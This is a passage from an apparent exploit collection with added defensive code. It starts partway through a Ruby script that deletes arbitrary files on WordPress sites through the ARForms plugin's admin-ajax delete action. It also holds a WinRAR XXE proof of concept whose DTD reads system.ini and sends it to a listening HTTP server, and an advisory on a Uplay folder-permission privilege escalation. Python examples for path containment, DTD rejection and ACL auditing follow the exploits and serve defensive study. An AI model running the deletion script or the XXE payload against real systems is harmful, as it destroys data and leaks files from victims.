      response = http.request(request).code
      puts "The File " + files_names[j] + " has the response code of " + response
    rescue Exception => e
      puts "[!] Failed!"
      puts e
    end
    j = j+1
  end
end

def check_existence_arform_folder ()
  path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
  $i = 0
  results = []
  while $i <= path_array.length-1
    uri = URI.parse("http://#{$host}/#{path_array[$i]}")
    #puts uri
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    results[$i] = response.code
    #puts"response code is : " + response.code
    $i +=1
  end
  puts "****************************************************"
  if results[0] == "200" || results[0] =="301"
    puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
  else
    puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
    exit
  end
  if (results[1] == "200" || results[1] == "301")
    puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
  else
    puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
  end
  puts "****************************************************"
end

def execute_deletion_attack ()
  puts "How many file you want to delete my man"
  amount = STDIN.gets.chomp.to_i
  if(amount == 0)
    puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
    exit
  end
  file_names = []
  file_names[0] = "143_772_1569713145702_temp3.txt"
  j = 1
  while j <= amount.to_i
    puts "Name of the file number " + j.to_s
    file_names[j] = STDIN.gets
    file_names[j].strip!
    j = j+1
  end
  uri = URI.parse("http://#{$host}")
  #puts uri
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = true if uri.scheme == 'https'
  request = Net::HTTP::Get.new(uri.request_uri)
  response = http.request(request)
  global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
  $i = 0
  while $i <= file_names.length-1
    puts "Starting the Attack Journey .. ".green
    uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
    headers = {
      'Referer' => 'From The Sky',
      'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
      'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
      'Accept-Encoding' => 'gzip, deflate',
      'Cookie' => global_cookie,
      'X_FILENAME' => file_names[$i],
      'X-FILENAME' => file_names[$i],
      'Connection' => 'close'
    }
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https'
    request = Net::HTTP::Post.new(uri.path, headers)
    request.body = File.read("post_file")
    response = http.request request
    $i = $i +1
  end
  execute_delete_request file_names,global_cookie,amount.to_i
  puts "Finished.........."
end

def execute_delete_request (file_names,cookies,rounds )
  $i = 0
  while $i <= file_names.length-1
    puts "Starting the Attack on file No #{$i.to_s} ".green
    uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
    headers = {
      'Referer' => 'From The Sky',
      'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
      'Accept' => '*/*',
      'Accept-Language' => 'en-US,en;q=0.5',
      'X-Requested-With'=> 'XMLHttpRequest',
      'Cookie' => cookies,
      'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept-Encoding' => 'gzip, deflate',
      'Connection' => 'close'
    }
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https'
    request = Net::HTTP::Post.new(uri.path,headers)
    request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
    response = http.request(request)
    if $i != 0
      puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
    end
    $i = $i +1
  end
  send_checks file_names
end

start_function()
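The root cause the advisory describes is a delete handler that joins a client-supplied `file_name` onto the upload folder without checking where the result lands, so `../../` sequences walk out of `wp-content/uploads/arforms/userfiles`. The following is an added example of how such a handler should treat the name (written here, not taken from the plugin or from the advisory): reject separators and NUL bytes outright, resolve the candidate path, and refuse anything whose parent is not exactly the upload directory. `demo()` builds a constructed WordPress-like tree in a temporary directory and reports what each name would have done.

```python
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when a client-supplied file name would escape the upload folder."""


def resolve_user_file(base_dir, file_name):
    """Map a client-supplied name to a path strictly inside base_dir.

    Defence in depth: reject separators and NUL up front, then resolve the
    candidate (following symlinks and collapsing '..') and require that its
    parent is exactly the resolved base directory. Names that look harmless
    but resolve elsewhere (a symlink planted in the folder, '..', '.') fail
    the second check even though they pass the first.
    """
    if not file_name or "\x00" in file_name:
        raise UnsafePath("empty name or NUL byte")
    if "/" in file_name or "\\" in file_name:
        raise UnsafePath("path separators are not allowed in a file name")
    base = Path(base_dir).resolve()
    candidate = (base / file_name).resolve()
    if candidate.parent != base:
        raise UnsafePath(f"{file_name!r} resolves outside {base}")
    return candidate


def delete_user_file(base_dir, file_name):
    """Delete one upload; True if a regular file was removed, False if absent."""
    target = resolve_user_file(base_dir, file_name)
    if not target.is_file():
        return False
    target.unlink()
    return True


def demo():
    """Exercise the check against a constructed tree; returns the outcomes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        uploads = root / "wp-content" / "uploads" / "arforms" / "userfiles"
        uploads.mkdir(parents=True)
        # File names below are constructed; the first mirrors the advisory's sample.
        (uploads / "143_772_1569713145702_temp3.txt").write_text("form upload")
        (root / "wp-config.php").write_text("<?php // constructed stand-in, not a real config")
        outcomes = {}
        for name in ("143_772_1569713145702_temp3.txt",
                     "../../../../wp-config.php",
                     "..\\..\\..\\..\\wp-config.php",
                     "..",
                     "x\x00.txt",
                     "missing.txt"):
            try:
                outcomes[name] = delete_user_file(uploads, name)
            except UnsafePath as exc:
                outcomes[name] = f"rejected: {exc}"
        outcomes["wp-config.php still present"] = (root / "wp-config.php").exists()
        return outcomes


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name!r}: {result}")
```

The same containment test applies to the upload side of the plugin: whatever name arrives in `X-FILENAME` should go through `resolve_user_file` before a file is written, and the server should generate its own storage name rather than trust the client's.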
24. # Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

# POC
1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window

html file

<html>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>

==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;
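The PoC above works only because the embedded XML parser resolves the `SYSTEM` entities in the internal DTD subset: the first reads a local file into `%file;`, the second fetches `start.dtd`, which then smuggles the file contents into an outbound URL. Any component that parses XML it did not produce should refuse such documents before handing them to the parser. The code below is an added example (not part of the advisory and not WinRAR's code) of that gate: it scans the prolog for a DOCTYPE, external entities and parameter entities, and only parses documents that carry none of them. Both sample documents are constructed; the unsafe one has the shape of the PoC's DTD.

```python
import re
import xml.etree.ElementTree as ET

# Constructed documents. UNSAFE_DOC mirrors the PoC's internal DTD subset;
# SAFE_DOC is an ordinary help-topic document with no DTD at all.
UNSAFE_DOC = """<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\\Windows\\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

SAFE_DOC = """<?xml version="1.0"?>
<topics><topic id="1">Using WinRAR</topic><topic id="2">Command line</topic></topics>
"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM ...> or <!ENTITY % name PUBLIC ...>: anything fetched from outside
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Parameter entities (<!ENTITY % ...>) are what let a remote DTD rewrite the document
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


class UnsafeXml(ValueError):
    """Raised when a document declares constructs that enable XXE."""


def dtd_findings(xml_text):
    """List the dangerous prolog constructs present in xml_text (empty if none)."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append("DOCTYPE present")
    if EXTERNAL_ENTITY_RE.search(xml_text):
        findings.append("external entity (SYSTEM/PUBLIC)")
    if PARAM_ENTITY_RE.search(xml_text):
        findings.append("parameter entity")
    return findings


def parse_untrusted(xml_text, allow_internal_doctype=False):
    """Parse xml_text only if it declares nothing that could resolve externally.

    With allow_internal_doctype=True a DOCTYPE is tolerated as long as it
    declares no external or parameter entities; the default rejects any DTD,
    which is the right setting for data you did not author yourself.
    """
    findings = dtd_findings(xml_text)
    if allow_internal_doctype and findings == ["DOCTYPE present"]:
        findings = []
    if findings:
        raise UnsafeXml("; ".join(findings))
    return ET.fromstring(xml_text)


def topic_titles(xml_text):
    """Convenience for the safe document: the text of every <topic>."""
    return [t.text for t in parse_untrusted(xml_text).iter("topic")]


if __name__ == "__main__":
    print("safe document ->", topic_titles(SAFE_DOC))
    try:
        parse_untrusted(UNSAFE_DOC)
    except UnsafeXml as exc:
        print("unsafe document rejected:", exc)
```

Rejecting the DTD up front is deliberately parser-independent: it holds whether the downstream parser is expat, MSXML, or a browser component, and it catches the `start.dtd` trick because the document has to declare the parameter entity locally before the remote DTD can be pulled in.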
25. # Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
# Date: 2019-08-07
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Vendor Homepage: https://uplay.ubisoft.com/
# Version: 92.0.0.6280
# Tested on: Windows 10 x64
# CVE : N/A

# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has insecure permissions
# that grant all BUILTIN\Users full permission. An attacker can replace the
# vulnerable executable file with a malicious file.

/////////////////////// Proof of Concept ///////////////////////

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(RX)
                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19 : Vendor released new patch
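What makes the `icacls` listing above a finding is not the inherited `BUILTIN\Users:(I)(RX)` entries, which are normal under `Program Files`, but the two explicit, non-inherited `BUILTIN\Users` ACEs granting `(F)`. Picking those out by eye across hundreds of installed programs does not scale, so the following is an added example (not part of the advisory and not the researchers' code) of a parser for `icacls` output that splits each ACE into principal, inheritance flags and rights, and flags any ACE that gives a low-privilege principal write-class access. The sample output is constructed from the advisory's listing plus the summary line `icacls` normally prints.

```python
import re

LAUNCHER_PATH = r"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"

# Constructed sample: the advisory's icacls output (first line carries the path)
# followed by the summary line icacls prints after a listing.
ICACLS_SAMPLE = r"""C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(RX)
                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""

INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Rights that let a principal replace or alter the directory's contents.
WRITE_CLASS_RIGHTS = {"F", "M", "W", "D", "DC", "WD", "AD", "WA", "WEA", "WDAC", "WO", "GW", "GA"}
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users", "Everyone",
    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE",
}

ACE_RE = re.compile(r"^\s*(?P<principal>[^:()]+?):(?P<groups>(?:\([A-Za-z,]*\))+)\s*$")


def parse_icacls(output, path):
    """Parse `icacls <path>` output into [{principal, flags, rights}, ...]."""
    entries = []
    for raw in output.splitlines():
        line = raw.rstrip()
        if line.startswith(path):            # only the first line carries the path
            line = line[len(path):]
        m = ACE_RE.match(line)
        if not m:                            # blank line or the summary line
            continue
        flags, rights = set(), set()
        for group in re.findall(r"\(([^)]*)\)", m.group("groups")):
            for token in filter(None, group.split(",")):
                (flags if token in INHERITANCE_FLAGS else rights).add(token)
        entries.append({"principal": m.group("principal").strip(),
                        "flags": flags, "rights": rights})
    return entries


def find_weak_aces(entries):
    """ACEs that give a low-privilege principal write-class rights."""
    return [e for e in entries
            if e["principal"] in LOW_PRIV_PRINCIPALS and e["rights"] & WRITE_CLASS_RIGHTS]


def remediation_command(path, principal):
    """One way to remove the explicit grants: drop them and keep the inherited RX.

    `/remove:g` strips the principal's explicit grant ACEs only; inherited
    entries such as (I)(RX) are untouched, so ordinary users keep read/execute.
    """
    return f'icacls "{path}" /remove:g "{principal}"'


if __name__ == "__main__":
    weak = find_weak_aces(parse_icacls(ICACLS_SAMPLE, LAUNCHER_PATH))
    for ace in weak:
        explicit = "explicit" if "I" not in ace["flags"] else "inherited"
        print(f'{ace["principal"]}: {sorted(ace["rights"])} ({explicit})')
    for principal in sorted({ace["principal"] for ace in weak}):
        print("fix:", remediation_command(LAUNCHER_PATH, principal))
```

Run the parser over `icacls` output collected for every directory under `Program Files` and `Program Files (x86)`; an explicit (non-`(I)`) write-class grant to `BUILTIN\Users` on a directory holding an auto-started or privileged executable is exactly the condition this advisory reports.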